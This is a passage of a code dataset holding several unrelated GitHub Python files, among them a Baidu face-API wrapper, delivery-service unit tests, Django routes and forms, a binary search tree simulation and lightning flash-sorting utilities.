open(filePath, mode='rb') as f:\r\n # print(\"ok, one moment\")\r\n return base64.b64encode(f.read()).decode(\"utf-8\")\r\n\r\n\r\n\r\n\r\n\r\n#-----------------face detection------\r\n\r\ndef detect(image, imageType):\r\n\r\n # optional parameters\r\n options = {}\r\n options[\"face_field\"] = \"age,beauty,gender\"\r\n options[\"max_face_num\"] = 2\r\n options[\"face_type\"] = \"LIVE\"\r\n\r\n # call face detection with parameters\r\n return client.detect(image, imageType, options)\r\n\r\n\r\n\r\n#--------------face registration----------------------\r\n# optional parameters; the image can also be a face_token\r\n\r\ndef addUser(image, imageType, group_id, user_id):\r\n options = {}\r\n options[\"user_info\"] = \"user's info\"\r\n options[\"quality_control\"] = \"NORMAL\"\r\n options[\"liveness_control\"] = \"NONE\"\r\n\r\n # call face registration with parameters\r\n return client.addUser(image, imageType, group_id, user_id, options)\r\n\r\n\r\n\r\n\r\n#--------------face search----------------------\r\n# optional parameters\r\ndef search(image, imageType):\r\n groupIdList = \"test\"\r\n\r\n \"\"\" optional parameters \"\"\"\r\n options = {}\r\n options[\"quality_control\"] = \"NORMAL\"\r\n options[\"liveness_control\"] = \"NONE\"\r\n\r\n options[\"max_user_num\"] = 2\r\n\r\n \"\"\" call face search with parameters \"\"\"\r\n return client.search(image, imageType, groupIdList, options)\r\n\r\n\r\n#--------------face update---------------------\r\ndef updateUsers(image, imageType, groupId, userId):\r\n # optional parameters\r\n options = {}\r\n options[\"user_info\"] = \"user's info\"\r\n options[\"quality_control\"] = \"NORMAL\"\r\n options[\"liveness_control\"] = \"LOW\"\r\n\r\n # call face update with parameters\r\n return client.updateUser(image, imageType, groupId, userId, options)\r\n\r\n#--------------face deletion---------------------\r\ndef deleteUser(userId, groupId, faceToken):\r\n # call face deletion\r\n return client.faceDelete(userId, groupId, 
faceToken)\r\n\r\n\r\n#--------------信息查询---------------------\r\ndef getUsers(userId, groupId):\r\n # 调用用户信息查询 \"\"\"\r\n return client.getUser(userId, groupId)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"lsy641/face-recogniton-demo-using-BaiduAIPlatform","sub_path":"bd-face-api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69854854233","text":"import json\nimport random\nimport tempfile\nfrom mock import MagicMock, AsyncMock, create_autospec, patch, call\n\nfrom tornado.testing import AsyncTestCase, gen_test\nfrom tornado.gen import coroutine\n\nfrom delivery.services.external_program_service import ExternalProgramService\nfrom delivery.services.dds_service import DDSService\nfrom delivery.models.db_models import DeliveryOrder, StagingOrder, StagingStatus, DeliveryStatus\nfrom delivery.models.execution import ExecutionResult, Execution\nfrom delivery.models.project import DDSProject\nfrom delivery.exceptions import InvalidStatusException\n\nfrom tests.test_utils import assert_eventually_equals\n\n\nclass TestDDSService(AsyncTestCase):\n\n def setUp(self):\n self.mock_dds_runner = create_autospec(ExternalProgramService)\n mock_process = MagicMock()\n mock_execution = Execution(\n pid=random.randint(1, 1000),\n process_obj=mock_process)\n self.mock_dds_runner.run.return_value = mock_execution\n\n @coroutine\n def wait_as_coroutine(x):\n return ExecutionResult(\n stdout=\"\",\n stderr=\"\",\n status_code=0)\n\n self.mock_dds_runner.wait_for_execution = wait_as_coroutine\n\n self.mock_staging_service = MagicMock()\n self.mock_delivery_repo = MagicMock()\n\n self.delivery_order = DeliveryOrder(\n id=1,\n delivery_source=\"/staging/dir/bar\",\n delivery_project=\"snpseq00001\",\n )\n\n self.mock_delivery_repo.create_delivery_order.return_value = self.delivery_order\n self.mock_delivery_repo.get_delivery_order_by_id.return_value = self.delivery_order\n\n self.mock_session_factory = MagicMock()\n self.mock_dds_config = {\n 'log_path': '/foo/bar/log',\n }\n self.dds_service = DDSService(\n external_program_service=ExternalProgramService(),\n staging_service=self.mock_staging_service,\n staging_dir='/foo/bar/staging_dir',\n delivery_repo=self.mock_delivery_repo,\n session_factory=self.mock_session_factory,\n dds_conf=self.mock_dds_config,\n )\n\n # Inject separate external runner instances for the tests, since they\n # need to return different information\n self.dds_service.dds_external_program_service = self.mock_dds_runner\n self.dds_service.external_program_service = self.mock_dds_runner\n\n self.token_file = tempfile.NamedTemporaryFile(mode='w+')\n self.token_file.write('ddstoken')\n self.token_file.flush()\n\n super(TestDDSService, self).setUp()\n\n @gen_test\n def test_dds_put(self):\n source = '/foo/bar'\n staging_target = '/staging/dir/bar'\n project_id = 'snpseq00001'\n deadline = '90'\n\n staging_order = StagingOrder(\n source=source,\n staging_target=staging_target)\n staging_order.status = StagingStatus.staging_successful\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n self.mock_staging_service.get_delivery_order_by_id.return_value = self.delivery_order\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n with patch('shutil.rmtree') as mock_rmtree:\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n 
new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(\n staging_id=1,\n deadline=deadline,\n )\n\n def _get_delivery_order():\n return self.delivery_order.delivery_status\n\n assert_eventually_equals(\n self, 1,\n _get_delivery_order,\n DeliveryStatus.delivery_successful)\n\n mock_rmtree.assert_called_once_with(staging_target)\n\n self.mock_dds_runner.run.assert_has_calls([\n call([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'data', 'put',\n '--mount-dir', '/foo/bar/staging_dir',\n '--source', staging_target,\n '--project', project_id,\n '--silent'\n ]),\n call([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'status', 'release',\n '--project', project_id,\n '--deadline', deadline,\n ]),\n ])\n\n @gen_test\n def test_dds_put_no_release(self):\n source = '/foo/bar'\n staging_target = '/staging/dir/bar'\n project_id = 'snpseq00001'\n deadline = '90'\n\n staging_order = StagingOrder(\n source=source,\n staging_target=staging_target)\n staging_order.status = StagingStatus.staging_successful\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n self.mock_staging_service.get_delivery_order_by_id.return_value = self.delivery_order\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n with patch('shutil.rmtree') as mock_rmtree:\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(\n staging_id=1,\n deadline=deadline,\n release=False,\n )\n\n def _get_delivery_order():\n return self.delivery_order.delivery_status\n\n assert_eventually_equals(\n self, 1,\n _get_delivery_order,\n DeliveryStatus.delivery_successful)\n\n mock_rmtree.assert_called_once_with(staging_target)\n\n self.mock_dds_runner.run.assert_called_once_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'data', 'put',\n '--mount-dir', '/foo/bar/staging_dir',\n '--source', staging_target,\n '--project', project_id,\n '--silent'\n ])\n\n def test_dds_project_with_token_string(self):\n expected_token_string = \"supersecretstring\"\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=expected_token_string,\n dds_project_id='snpseq00001')\n\n with open(dds_project.temporary_token.name) as token:\n actual_token_string = token.read()\n\n self.assertEqual(actual_token_string, expected_token_string)\n self.assertEqual(\n dds_project.temporary_token.name,\n dds_project._base_cmd[2])\n\n @gen_test\n def test_dds_put_raises_on_non_existent_stage_id(self):\n self.mock_staging_service.get_stage_order_by_id.return_value = None\n\n with self.assertRaises(InvalidStatusException):\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id='snpseq00001')\n\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(staging_id=1)\n\n @gen_test\n def test_dds_put_raises_on_non_successful_stage_id(self):\n\n staging_order = StagingOrder()\n staging_order.status = StagingStatus.staging_failed\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n with self.assertRaises(InvalidStatusException):\n dds_project = DDSProject(\n dds_service=self.dds_service,\n 
auth_token=self.token_file.name,\n dds_project_id='snpseq00001')\n\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(staging_id=1)\n\n def test_delivery_order_by_id(self):\n delivery_order = DeliveryOrder(\n id=1,\n delivery_source='src',\n delivery_project='snpseq00001',\n delivery_status=DeliveryStatus.delivery_in_progress,\n staging_order_id=11,\n )\n self.mock_delivery_repo.get_delivery_order_by_id.return_value = delivery_order\n actual = self.dds_service.get_delivery_order_by_id(1)\n self.assertEqual(actual.id, 1)\n\n @gen_test\n def test_possible_to_delivery_by_staging_id_and_skip_delivery(self):\n source = '/foo/bar'\n staging_target = '/staging/dir/bar'\n staging_order = StagingOrder(\n source=source,\n staging_target=staging_target)\n staging_order.status = StagingStatus.staging_successful\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n self.mock_staging_service.get_delivery_order_by_id.return_value = self.delivery_order\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id='snpseq00001')\n\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(staging_id=1, skip_delivery=True)\n\n def _get_delivery_order():\n return self.delivery_order.delivery_status\n\n assert_eventually_equals(\n self,\n 1,\n _get_delivery_order,\n DeliveryStatus.delivery_skipped)\n\n def test_parse_dds_project_id(self):\n dds_output = \"\"\"Current user: bio\nProject created with id: snpseq00003\nUser forskare was associated with Project snpseq00003 as Owner=True. An e-mail notification has not been sent.\nInvitation sent to email@adress.com. 
The user should have a valid account to be added to a\nproject\"\"\"\n\n self.assertEqual(\n DDSProject._parse_dds_project_id(dds_output),\n \"snpseq00003\")\n\n @gen_test\n def test_create_project(self):\n project_name = \"AA-1221\"\n project_metadata = {\n \"description\": \"Dummy project\",\n \"pi\": \"alex@doe.com\",\n \"researchers\": [\"robin@doe.com\", \"kim@doe.com\"],\n \"owners\": [\"alex@doe.com\"],\n }\n\n with patch(\n 'delivery.models.project'\n '.DDSProject._parse_dds_project_id'\n ) as mock_parse_dds_project_id:\n mock_parse_dds_project_id.return_value = \"snpseq00001\"\n\n yield DDSProject.new(\n project_name,\n project_metadata,\n auth_token=self.token_file.name,\n dds_service=self.dds_service)\n\n self.mock_dds_runner.run.assert_called_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'create',\n '--title', project_name.replace('-', ''),\n '--description', f'\"{project_metadata[\"description\"]}\"',\n '-pi', project_metadata['pi'],\n '--owner', project_metadata['owners'][0],\n '--researcher', project_metadata['researchers'][0],\n '--researcher', project_metadata['researchers'][1],\n ])\n\n @gen_test\n def test_release_project(self):\n project_id = 'snpseq00001'\n deadline = '90'\n email = True\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n yield dds_project.release(\n deadline=deadline,\n email=email,\n )\n\n self.mock_dds_runner.run.assert_called_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'status', 'release',\n '--project', project_id,\n '--deadline', deadline,\n ])\n\n @gen_test\n def test_release_project_nomail(self):\n project_id = 'snpseq00001'\n deadline = '90'\n email = False\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n yield dds_project.release(\n deadline=deadline,\n email=email,\n )\n\n self.mock_dds_runner.run.assert_called_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'status', 'release',\n '--project', project_id,\n '--deadline', deadline,\n '--no-mail',\n ])\n\n @gen_test\n def test_get_dds_project_title(self):\n mock_dds_project = [{\n \"Access\": True,\n \"Last updated\": \"Fri, 01 Jul 2022 14:31:13 CEST\",\n \"PI\": \"pi@email.com\",\n \"Project ID\": \"snpseq00025\",\n \"Size\": 25856185058,\n \"Status\": \"In Progress\",\n \"Title\": \"AB1234\"\n }]\n\n with patch(\n 'delivery.models.project.DDSProject._run',\n new_callable=AsyncMock,\n return_value=json.dumps(mock_dds_project),\n ):\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=mock_dds_project[0][\"Project ID\"],\n )\n\n ngi_project_name = yield dds_project.get_ngi_project_name()\n self.assertEqual(ngi_project_name, \"AB-1234\")\n","repo_name":"arteria-project/arteria-delivery","sub_path":"tests/unit_tests/services/test_dds.py","file_name":"test_dds.py","file_ext":"py","file_size_in_byte":15302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69965631192","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^getMessages$', views.getMessages, name='getMessages'),\n url(r'^sendMessage$', views.sendMessage, name='sendMessage'),\n\n url(r'^login$', views.login, name='login'), \n url(r'^accounts/login/$', views.login, name='login'),\n url(r'^logout$', views.logout, name='logout'),\n\n url(r'^sendPublicKey$', views.sendPublicKey, name='sendPublicKey'),\n]","repo_name":"kasper512/ChiffresMedia","sub_path":"webServer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"386817924","text":"import javalang\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\ndata = {}\r\nmethods =[]\r\ngod_class = {}\r\n\r\nfor paths, dirs, files in os.walk(\"./project-1-god-classes-ZhiziWen-main/resources/xerces2-j-src\", topdown =\"true\"):\r\n for name in files:\r\n if '.java' in name:\r\n fullpath = os.path.join(paths, name)\r\n f = open(fullpath, 'r')\r\n f_read = f.read()\r\n tree = javalang.parse.parse(f_read)\r\n for path, node in tree:\r\n if type(node) is javalang.tree.ClassDeclaration:\r\n methods.append(len(node.methods))\r\n data[node.name] = len(node.methods)\r\n\r\naverage = np.mean(methods)\r\nstd = np.std(methods)\r\nthreshold_god = average + 6 * std\r\n\r\nfor key in data:\r\n if data[key] > threshold_god:\r\n god_class[key] = data[key]\r\ngod_df = pd.DataFrame(god_class.items(), columns=['class_name','method_num'])\r\nprint(god_df)\r\n\r\n\r\n","repo_name":"ZhiziWen/God-class-recognition-clustering-and-evaluation","sub_path":"find_god_class.py","file_name":"find_god_class.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16844907735","text":"from typing import Any, Dict, List, Optional, Union\n\nclass Node:\n\n left = None\n right = None\n\n def __init__(self, key : Any = None, value : int = None, size : int = 1) -> None:\n\n self.key = key\n self.value = value\n self.size = size\n \n\n def print(self):\n\n string = self.print_string()\n\n if self.left is not None:\n string += f'. Left - {self.left.print_string()}'\n\n if self.right is not None:\n string += f'. 
Right - {self.right.print_string()}'\n\n print(string)\n\n def print_string(self):\n return (f'Node key: {self.key}, value: {self.value}')\n\nclass BinarySearchTree:\n\n root = None\n compares = 0\n\n def size(self) -> int:\n return self.size_(self.root)\n\n def size_(self, node : Node) -> int:\n\n if node is None:\n return 0\n else:\n return node.size\n\n def compare(self, key_1 : Any, key_2 : Any) -> int:\n\n if key_1 > key_2:\n self.compares += 1\n return -1\n elif key_1 < key_2:\n self.compares += 2\n return 1\n else:\n self.compares += 2\n return 0\n\n\n def put(self, key : Any, value : int) -> Node:\n\n # Reset compares\n self.compares = 0\n\n self.root = self.put_(node = self.root, key = key, value = value)\n\n def put_(self, node : Node, key : Any, value : int) -> Node:\n\n if node is None:\n return Node(key = key, value = value)\n \n compared = self.compare(key_1=node.key, key_2=key)\n\n if compared < 0:\n node.left = self.put_(node = node.left, key = key, value = value)\n elif compared > 0:\n node.right = self.put_(node = node.right, key = key, value = value)\n # If the key is a match, overwrite value\n else:\n node.value = value\n\n node.size = self.size_(node.left) + self.size_(node.right) + 1\n\n # Return the node\n return node\n\n def get(self, key : Any) -> Node:\n\n # Reset compares\n self.compares = 0\n\n return self.get_(node = self.root, key = key)\n\n def get_(self, node : Node, key : Any) -> Any:\n\n if node is None:\n return None\n\n compared = self.compare(key_1=node.key, key_2=key)\n\n if compared < 0:\n return self.get_(node = node.left, key = key)\n elif compared > 0:\n return self.get_(node = node.right, key = key)\n # If the key is a match, overwrite value\n else:\n return node.value\n\n\nnode = Node(key='hello', value=1)\nnode.print()\n\nbst = BinarySearchTree()\n\nbst.put(key='hello', value=1)\nbst.put(key='a', value=2)\nbst.put(key='k', value=3)\n \nbst.root.print()\n\nval = bst.get('k')\nprint(f'Val for key k: {val}')\n\nprint(f'BST size: {bst.size()}')\n\n\nimport random\nimport string\n\n\ntests = 1000\n\ntest_bst = BinarySearchTree()\ntest_dict = {}\n\nfor n in range(tests):\n\n key = random.randint(0, tests)#random.choice(string.ascii_letters)\n value = random.randint(0, tests)\n print(key, value)\n test_dict[key] = value\n\n test_bst.put(key=key, value=value)\n\n print(f'Put key: {key}, value: {value}, BST size: {test_bst.size()}')\n\nfor key, value_true in test_dict.items():\n\n value = test_bst.get(key)\n print(f'key: {key}, value_true: {value_true}, value: {value}, BST size: {test_bst.size()}, compares: {test_bst.compares}')\n\n assert value == value_true\n\n\nnum_tests = 1000\nmax_entries = 100\n\n\ncompares_result = []\nbst_size = []\n\n\n\nfor n in range(num_tests):\n print(f'Test {n} of {num_tests}')\n entries = random.randint(1, max_entries+1)\n\n test_bst = BinarySearchTree()\n\n for m in range(entries):\n\n key = random.randint(0, entries)\n value = random.randint(0, entries)\n\n test_bst.put(key=key, value=value)\n\n compares_result += [test_bst.compares]\n bst_size += [test_bst.size()]\n\n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nresults = pd.DataFrame({'size':bst_size, 'compares':compares_result})\n\ncompares_average_result = []\nsize_average = []\n\nfor size in results['size'].unique():\n\n size_average += [size]\n\n compares_average_result += [results[results['size'] == size]['compares'].mean()]\n\nprint(results)\n\nplt.figure()\nplt.scatter(bst_size, compares_result, alpha=0.2)\nplt.plot(size_average, 
compares_average_result, label='Compares average', alpha=1, color='C1')\nplt.title('Simulation output')\nplt.xlabel('BST Size [Nodes]')\nplt.ylabel('Compares')\nplt.legend()\nplt.savefig('simulation_output/binary_search_tree/compares.png')\n\nplt.close()","repo_name":"asmusbhansen/clrs","sub_path":"clrs/data_structures/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6436256513","text":"import numpy as np\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import validation_curve\nfrom direction.MLP_Classifier import get_data\n\nif __name__ == \"__main__\":\n data, label,_ = get_data(path=\"data/\")\n\n print(data.shape)\n print(label.shape)\n\n\n param_range = ['identity', 'logistic', 'tanh', 'relu']\n\n train_score, test_score = validation_curve(\n MLPClassifier(hidden_layer_sizes=(200,), learning_rate_init=0.01,\n activation=\"relu\", solver='adam', max_iter=500),\n data, label,\n param_name='activation',\n param_range=param_range, cv=10, scoring='accuracy')\n\n train_score = np.mean(train_score, axis=1)\n test_score = np.mean(test_score, axis=1)\n\n print(param_range)\n print(train_score)\n print(test_score)\n","repo_name":"qinqiang1990/zto","sub_path":"direction/Selection_MLP_Classifier.py","file_name":"Selection_MLP_Classifier.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44152192565","text":"from django import forms\nfrom django.forms import ModelForm\nfrom almacen.models import Tipo, Almacen, Zona, Suministro, GrupoSuministros\nfrom usuarios.models import Empresa\n\nclass UploadForm(forms.Form):\n docfile = forms.FileField(label='Selecciona un archivo')\n\nclass TipoIngresoForm(forms.ModelForm):\n\n class Meta:\n model = Tipo\n fields =['codigo','descripcion_valor']\n\n def __init__(self, *args, **kwargs):\n self.tabla = \"tipo_Ingreso\"\n self.descripcion_campo = \"tipo_Ingreso\"\n super(TipoIngresoForm, self).__init__(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n self.instance.tabla = self.tabla\n self.instance.descripcion_campo = self.descripcion_campo\n super(TipoIngresoForm, self).save(*args, **kwargs)\n\nclass TipoUnidadForm(forms.ModelForm):\n\n class Meta:\n model = Tipo\n fields =['codigo','descripcion_valor']\n\n def __init__(self, *args, **kwargs):\n self.tabla = \"tipo_unidad_medida\"\n self.descripcion_campo = \"tipo_unidad_medida\"\n super(TipoUnidadForm, self).__init__(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n self.instance.tabla = self.tabla\n self.instance.descripcion_campo = self.descripcion_campo\n super(TipoUnidadForm, self).save(*args, **kwargs) \n\nclass TipoStockForm(forms.ModelForm):\n\n class Meta:\n model = Tipo\n fields =['codigo','descripcion_valor']\n\n def __init__(self, *args, **kwargs):\n self.tabla = \"tipo_stock\"\n self.descripcion_campo = \"tipo_stock\"\n super(TipoStockForm, self).__init__(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n self.instance.tabla = self.tabla\n self.instance.descripcion_campo = self.descripcion_campo\n super(TipoStockForm, self).save(*args, **kwargs) \n\nclass AlmacenForm(forms.ModelForm):\n\n def __init__(self, empresa,*args, **kwargs):\n super(AlmacenForm, self).__init__(*args, **kwargs)\n self.fields['empresa'].queryset = Empresa.objects.filter(codigo=empresa.codigo) \n\n class Meta:\n model = 
Almacen\n fields =['descripcion','empresa','zona']\n\nclass ZonaForm(forms.ModelForm):\n\n class Meta:\n model = Zona\n fields =['descripcion']\n\nclass GrupoSuministrosForm(forms.ModelForm):\n\n class Meta:\n model = GrupoSuministros\n fields = ['descripcion','ctaalm','ctacomp']\n\n \n\nclass SuministroForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(SuministroForm, self).__init__(*args, **kwargs)\n self.fields['tipo_unidad_medida'].queryset = Tipo.objects.filter(tabla=\"tipo_unidad_medida\")\n self.fields['tipo_stock'].queryset = Tipo.objects.filter(tabla=\"tipo_stock\")\n\n class Meta:\n model = Suministro\n fields =['descripcion', 'precio_mercado', 'grupo_suministros','tipo_unidad_medida','tipo_stock'] ","repo_name":"joseamaya/almacen","sub_path":"almacen/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"65249848","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport os, sys, re\nimport glob\nimport tempfile\nimport shutil\nimport subprocess\nimport logging, logging.handlers\nimport datetime\n\nfrom lmatools.flashsort.flash_stats import calculate_flash_stats, Flash, FlashMetadata\nfrom lmatools.io.LMAarrayFile import cat_LMA, LMAdataFile\n\nfrom .mflash import write_header\n\nLOG_BASEFILENAME = datetime.datetime.now().strftime('Flash-autosort.log')\n\n\ndef logger_setup(logpath):\n logger = logging.getLogger('FlashAutorunLogger')\n logfile = os.path.join(logpath, LOG_BASEFILENAME)\n loghandler = logging.handlers.RotatingFileHandler(logfile, maxBytes=1024*1024, backupCount=3)\n logger.addHandler(loghandler)\n logger.setLevel(logging.DEBUG)\n\n\n# assume that source code for the flash program is in the same directory as this module\ntry:\n src_dir = os.path.dirname(__file__)\nexcept:\n src_dir = os.getcwd()\n \nbuild_files = ( #'mflashcustom.f',\n 'makefile',\n )\n \nflash_output_dir = 'output' # created within the build directory\nflash_prg_name = 'mflashcustom' # created within the build directory\n\ntmp_flashsort_prepend = 'flashsort_'\n\ndef build(directory=None, mflash_params=None):\n \"\"\" Build the flash program in directory; a temporary directory is created by default. \"\"\"\n \n\n if directory == None:\n d = tempfile.mkdtemp('', tmp_flashsort_prepend)\n else:\n d = directory\n \n write_header(os.path.join(d,'mflashcustom.f'), **mflash_params)\n\n for filename in build_files:\n shutil.copyfile(os.path.join(src_dir, filename),\n os.path.join(d, filename))\n \n os.chdir(d)\n os.mkdir(flash_output_dir)\n \n make_cmd = ['make','-f','makefile']\n rc = subprocess.call(make_cmd)\n \n return d\n \n\ndef cleanup_build(directory):\n logger = logging.getLogger('FlashAutorunLogger')\n \n if tmp_flashsort_prepend in directory:\n shutil.rmtree(directory)\n else:\n logger.warning( \n \"Temporary build directory %s doesn't appear to be a flashsort directory.\" % (directory,)\n )\n \n\n \n\ndef sort_file(filename, directory):\n \"\"\" Sort one LMA data file into flashes. dir is the directory with the flash program\"\"\"\n logger = logging.getLogger('FlashAutorunLogger')\n \n f, command, the_input = cat_LMA(filename)\n \n run_cmd = [os.path.join(directory, flash_prg_name)]\n logger.info( 'Running %s' % (run_cmd,)) #, 'with stdin from ', command \n \n # comment out stdout=subprocess.PIPE to print stdout to the terminal. 
when uncommented,\n # stdout is captured to python, which leads to less noise in the terminal\n p = subprocess.Popen(run_cmd, stdin=f.stdout, stdout=subprocess.PIPE)#, preexec_fn=f.stdin.close)\n \n # The communication step is key to not blocking at completion.\n out, err = p.communicate()#input=the_input) #out, err not connected to pipes, so nothing to capture or print\n \n # print out\n # print 'Errors: ', err\n return out, err\n \n \n\ndef collect_output(datafile, min_points=1, mask_length=4):\n \"\"\" collect all output from the flash program output directory created by\n the flash program in flash_dir and calculate some additional stats on each flash \n \"\"\"\n import numpy as np\n \n logger = logging.getLogger('FlashAutorunLogger')\n \n # outdir = os.path.join(flash_dir,flash_output_dir)\n # os.chdir(outdir)\n \n lma = LMAdataFile(datafile, mask_length=mask_length)\n \n # get the mapping from flash_ids to the points\n order = np.argsort(lma.flash_id)\n \n # In the case of no data in the file, lma.data.shape will have length zero, i.e., a 0-d array\n if len(lma.data.shape) == 0:\n # No data\n flashes = []\n else:\n flid = lma.flash_id[order]\n boundaries, = np.where(flid[1:]-flid[:-1]) # where indices are nonzero\n boundaries = np.hstack(([0], boundaries+1))\n \n all_data = lma.data[order]\n \n max_idx = len(flid) #- 1\n slice_lower_edges = tuple(boundaries)\n slice_upper_edges = slice_lower_edges[1:] + (max_idx,)\n slices = list(zip(slice_lower_edges, slice_upper_edges))\n \n flashes = [ Flash(all_data[slice(*sl)]) for sl in slices ]\n \n # calculate extra flash metadata, e.g., initation, centroid\n logtext = \"Calculating flash initation, centroid, area, etc. for %d flashes\" % (len(flashes), )\n logger.info(logtext)\n # print flashes[0].points.dtype\n for fl in flashes:\n header = ''.join(lma.header)\n fl.metadata = FlashMetadata(header)\n calculate_flash_stats(fl)\n \n return lma, flashes\n\n\n\ndef cluster(a_file, output_path, outfile, params, logger, min_points=1, retain_ascii_output=True, cleanup_tmp=True):\n # logger = logging.getLogger('FlashAutorunLogger')\n \n now = datetime.datetime.now().strftime('mflash run started %Y%m%d-%H%M%S')\n logger.info(now)\n \n \n d = build(mflash_params=params) # returns temporary directory name\n logger.debug('Built flash program in %s' % d)\n\n logger.info('Sorting flashes for %s' % a_file)\n out, err = sort_file(a_file, d) # out contains sorted flash data (via stdout)\n # print out\n\n\n # file_base_name = os.path.split(a_file)[-1].replace('.gz', '')\n # print 'filebase = ', file_base_name\n # outfile = os.path.join(output_path, file_base_name+'.flash.h5')\n # write_output(outfile, flashes, file_base_name)\n # print 'Wrote original data and flashes to ', outfile\n\n # outfile = os.path.join(output_path, file_base_name+'.flash')\n shutil.copyfile(os.path.join(d, 'flashes_out.dat'),\n outfile) \n \n if 'mask_length' in params:\n mask_length = params['mask_length']\n else:\n mask_length = 4\n lmadata, flashes = collect_output(outfile, mask_length=mask_length)#, min_points=min_points)\n\n if retain_ascii_output==False:\n os.remove(outfile)\n else:\n logger.info('Wrote ascii event and flash data to %s' % outfile)\n if cleanup_tmp == True:\n result = cleanup_build(d)\n else:\n logger.warning('did not delete flashsort directory in /tmp')\n \n return lmadata, flashes\n\n\ndef test_output():\n import tables as T\n h5 = T.openFile('/Users/ebruning/out/LYLOUT_040526_213000_0600.dat.gz.flash.h5')\n flashes = h5.root.flashes.LMA_040526_213000_600\n 
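# note: these node paths are specific to this sample file; flashes holds one row per flash\n # and events holds the per-source rows that point back to a flash via flash_id\n 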
events = h5.root.events.LMA_040526_213000_600\n # flashes.cols.n_points[0:100]\n big = [fl['flash_id'] for fl in flashes if fl['n_points'] > 100]\n a_flash = big[0]\n points = [ev['lat'] for ev in events if ev['flash_id'] == a_flash]\n print(flashes.cols.init_lon[0:10])\n\n\n","repo_name":"deeplycloudy/lmatools","sub_path":"lmatools/flashsort/autosort/autorun_mflash.py","file_name":"autorun_mflash.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"5"} +{"seq_id":"4769589104","text":"import torch\n\nfrom torch.nn import functional as F\nfrom nltk.translate import bleu_score\nfrom sklearn.metrics import accuracy_score, f1_score\n\ndef normalize_sizes(y_pred, y_true):\n \"\"\"Normalize tensor sizes.\n \n Args:\n y_pred (torch.Tensor): the model output.\n If it is a 3-D tensor, it is reshaped into a matrix.\n y_true (torch.Tensor): the target predictions.\n If it is a matrix, it is reshaped into a vector.\n \"\"\"\n if len(y_pred.size()) == 3:\n y_pred = y_pred.contiguous().view(-1, y_pred.size(2))\n if len(y_true.size()) == 2:\n y_true = y_true.contiguous().view(-1)\n return y_pred, y_true\n\ndef compute_accuracy_mt(y_pred, y_true, mask_index):\n y_pred, y_true = normalize_sizes(y_pred, y_true)\n\n _, y_pred_indices = y_pred.max(dim=1)\n \n 